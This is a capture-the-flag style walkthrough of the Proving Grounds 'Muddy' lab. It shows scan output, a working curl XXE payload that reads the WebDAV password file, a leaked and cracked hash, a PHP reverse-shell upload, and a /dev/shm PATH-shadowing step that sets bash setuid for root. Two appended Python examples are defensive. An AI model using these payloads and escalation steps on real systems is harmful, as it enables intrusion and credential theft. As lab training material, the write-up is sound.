OSCP - Proving Grounds - Muddy

Key takeaways

  • Exploiting CVE-2019-1010268
  • Locating the Apache configuration file
  • Linux PATH shadowing: Linux looks for an executable in PATH entries from left to right, so a writable directory early in PATH can shadow a command and be used for privilege escalation

Walkthrough

Run an nmap scan. Many ports are open, but the useful one is 8888:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-29 20:15 EDT
Warning: 192.168.189.161 giving up on port because retransmission cap hit (10).
Nmap scan report for muddy.ugc (192.168.189.161)
Host is up (0.11s latency).
Not shown: 65503 closed tcp ports (conn-refused)
PORT      STATE    SERVICE       VERSION
22/tcp    open     ssh           OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_  256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
25/tcp    open     smtp          Exim smtpd 4.92
| smtp-commands: muddy Hello muddy.ugc [192.168.45.157], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
80/tcp    open     http          Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.7
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Muddy | Found some mud? Call us! – A muddy WordPress!
111/tcp   open     rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
8888/tcp  open     http          WSGIServer 0.1 (Python 2.7.16)
|_http-title: Ladon Service Catalog

Running dirsearch against port 80 reveals a WebDAV installation:

# Dirsearch started Sun Oct  6 06:59:19 2024 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u 192.168.116.161 -w /usr/share/wordlists/dirb/big.txt

301   323B   http://192.168.116.161/javascript    -> REDIRECTS TO: http://192.168.116.161/javascript/
403   280B   http://192.168.116.161/server-status
401   462B   http://192.168.116.161/webdav
301   321B   http://192.168.116.161/wp-admin    -> REDIRECTS TO: http://192.168.116.161/wp-admin/
301   323B   http://192.168.116.161/wp-content    -> REDIRECTS TO: http://192.168.116.161/wp-content/
301   324B   http://192.168.116.161/wp-includes    -> REDIRECTS TO: http://192.168.116.161/wp-includes/

Visiting port 8888 shows that the Ladon framework is enabled. A quick search turns up "Ladon Framework for Python 0.9.40 - XML External Entity Expansion" (an XML webapps exploit).


At its core this is local file inclusion (an arbitrary file read). After some digging, the Apache configuration file at /etc/apache2/sites-available/000-default.conf reveals where the WebDAV password file lives:

<VirtualHost *:80>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html

        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf

        <Directory "/var/www/html/webdav">
          AuthType Basic
          AuthName "Restricted Content"
          AuthUserFile /var/www/html/webdav/passwd.dav
          DAV On
          Require valid-user
        </Directory>

</VirtualHost>


Following the PoC, call the endpoint from Postman (the request exported as curl below) to retrieve the WebDAV password file:

curl --location '192.168.116.161:8888/muddy/soap11' \
--header 'Content-Type: text/xml; charset=utf-8' \
--header 'SOAPAction: http://192.168.116.161:8888/muddy/soap11/checkout' \
--data '<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE uid
[<!ENTITY passwd SYSTEM "file:///var/www/html/webdav/passwd.dav">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <checkout>
            <uid>&passwd;</uid>
        </checkout>
    </soap:Body>
</soap:Envelope>
'

Response

<?xml version="1.0" encoding="utf-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="urn:muddy" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    <SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <ns:checkoutResponse>
            <result>Serial number: administrant:$apr1$GUG1OnCu$uiSLaAQojCm14lPMwISDi0</result>
        </ns:checkoutResponse>
    </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
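As an added example (not from this writeup or from Ladon's code), here is the parser behaviour behind the leak, reproduced with Python's xml.sax against a constructed temporary file standing in for passwd.dav; feature_external_ges is the single switch that separates the vulnerable parser from a hardened one:

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

def build_request(path):
    # Same shape as the SOAP request above, pointed at a constructed temp file.
    return f'''<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE uid [<!ENTITY passwd SYSTEM "file://{path}">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body><checkout><uid>&passwd;</uid></checkout></soap:Body>
</soap:Envelope>'''

class UidHandler(ContentHandler):
    # Collects the text inside <uid>, i.e. what checkout() receives as its argument.
    def __init__(self):
        super().__init__()
        self.in_uid, self.uid = False, ""
    def startElement(self, name, attrs):
        if name == "uid":
            self.in_uid = True
    def endElement(self, name):
        if name == "uid":
            self.in_uid = False
    def characters(self, data):
        if self.in_uid:
            self.uid += data

def extract_uid(xml_text, resolve_external_entities):
    parser = xml.sax.make_parser()
    # With the feature on, the parser fetches the SYSTEM entity and splices the
    # file's bytes into <uid>; with it off, the reference resolves to nothing.
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = UidHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return handler.uid

def demo():
    # Constructed stand-in for passwd.dav; the hash is not a real credential.
    with tempfile.NamedTemporaryFile("w", suffix=".dav", delete=False) as f:
        f.write("administrant:$apr1$CONSTRUCTED$notarealhash")
    try:
        request = build_request(f.name)
        return extract_uid(request, True), extract_uid(request, False)
    finally:
        os.unlink(f.name)
```

Python 3.7.1 and later default this feature to off, which is the behaviour any service accepting SOAP from untrusted clients should keep.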

Crack the hash locally with john:

C:\home\kali\Documents\OFFSEC\WarmUp\Muddy> john webdav_passwd --wordlist=/usr/share/wordlists/rockyou.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sleepless        (?)     
1g 0:00:00:00 DONE (2024-10-06 06:48) 1.818g/s 127418p/s 127418c/s 127418C/s softball30..ramarama
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Enable a WebDAV extension in Firefox, which lets us upload files directly. Edit /usr/share/webshells/php/php-reverse-shell.php and upload it, start nc -nlvp 1234 locally, then browse to http://192.168.116.161/webdav/php-reverse-shell.php to get a reverse shell.


Upload and run linpeas.sh. It finds a cron job that runs netstat, and we have write access to /dev/shm:

SHELL=/bin/sh
PATH=/dev/shm:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    netstat -tlpn > /root/status && service apache2 status >> /root/status && service mysql status >> /root/status
bash-5.0# ls -la /dev | grep shm
ls -la /dev | grep shm
drwxrwxrwt  2 root root          60 Oct  6 07:24 shm

Because Linux resolves a command by searching PATH from left to right and running the first match, and /dev/shm is the first PATH entry in that crontab, we can plant our own netstat there and get root:

www-data@muddy:/home/ian$ cd /dev/shm
cd /dev/shm
www-data@muddy:/dev/shm$ echo "chmod +s /bin/bash" >netstat
echo "chmod +s /bin/bash" >netstat
www-data@muddy:/dev/shm$ ls -l
ls -l
total 4
-rw-rw-rw- 1 www-data www-data 19 Oct  6 07:24 netstat
www-data@muddy:/dev/shm$ chmod +x netstat
chmod +x netstat
www-data@muddy:/dev/shm$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
www-data@muddy:/dev/shm$ /bin/bash -p
/bin/bash -p
bash-5.0# cat /root/proof.txt
cat /root/proof.txt
3c798fbaf8139af5c19c1d314fa139c8
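As an added defender-side example (not from this writeup), a small Python audit that parses a system crontab, extracts its PATH, and reports every world-writable directory searched before the real binary of each job command; the demo builds a constructed temporary layout mirroring the /dev/shm case rather than touching the real system:

```python
import os
import stat
import tempfile

def parse_crontab(text):
    # Returns (PATH entries, [command strings]); schedule lines start with a digit or '*'.
    path_dirs, commands = [], []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("PATH="):
            path_dirs = line[5:].split(":")
        elif line and not line[0].isalpha():
            fields = line.split(None, 6)      # min hour dom mon dow user command
            if len(fields) == 7:
                commands.append(fields[6])
    return path_dirs, commands

def risky_dirs(cmd, path_dirs):
    # PATH entries searched before (or holding) cmd that any user can write to.
    risky = []
    for d in path_dirs:
        if os.path.isdir(d) and os.stat(d).st_mode & stat.S_IWOTH:
            risky.append(d)
        if os.access(os.path.join(d, cmd), os.X_OK):
            break                             # the shell stops at the first hit
    return risky

def audit(text):
    # Maps each bare command name in the crontab to the writable dirs that can shadow it.
    path_dirs, commands = parse_crontab(text)
    findings = {}
    for command in commands:
        for segment in command.split("&&"):
            cmd = segment.split()[0]
            if not cmd.startswith("/"):       # an absolute path skips the PATH search
                findings[cmd] = risky_dirs(cmd, path_dirs)
    return findings

def demo():
    # Constructed layout mirroring the target: a 1777 dir listed ahead of the dir holding netstat.
    with tempfile.TemporaryDirectory() as root:
        for d, mode in (("bin", 0o755), ("shm", 0o1777)): os.mkdir(f"{root}/{d}"); os.chmod(f"{root}/{d}", mode)
        open(f"{root}/bin/netstat", "w").close(); os.chmod(f"{root}/bin/netstat", 0o755)
        text = (f"SHELL=/bin/sh\nPATH={root}/shm:{root}/bin\n"
                "*  *    * * *   root    netstat -tlpn > /root/status && service apache2 status >> /root/status\n")
        return {cmd: [os.path.basename(d) for d in dirs] for cmd, dirs in audit(text).items()}
```

Run audit() over the real /etc/crontab to get the same report for a live host; any non-empty list means the job's command can be shadowed by an unprivileged user, and the fix is to drop the writable directory from PATH or call the binary by absolute path.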
